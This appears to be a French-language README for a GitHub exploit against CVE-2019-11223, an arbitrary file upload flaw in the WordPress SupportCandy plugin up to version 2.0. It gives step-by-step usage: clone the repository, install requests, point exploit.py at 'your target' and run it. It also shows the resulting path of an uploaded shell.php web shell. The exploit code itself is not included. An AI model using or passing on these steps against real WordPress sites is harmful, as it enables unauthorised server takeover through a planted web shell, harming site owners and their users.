
CVE-2019-11223 - Téléversement arbitraire de fichiers dans le plugin WordPress Support Candy, versions 2.0 et inférieures
Téléchargement arbitraire de fichiers dans le plugin WordPress SupportCandy version 2.0 et inférieure
git clone https://github.com/AngelCtulhu/CVE-2019-11223.git
pip install requests
dans exploit.py, remplacez localhost par votre cible
python exploit.py
"http:\/\/localhost\/wp-content\/uploads\/wpsc\/1555513124_shell.php"
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.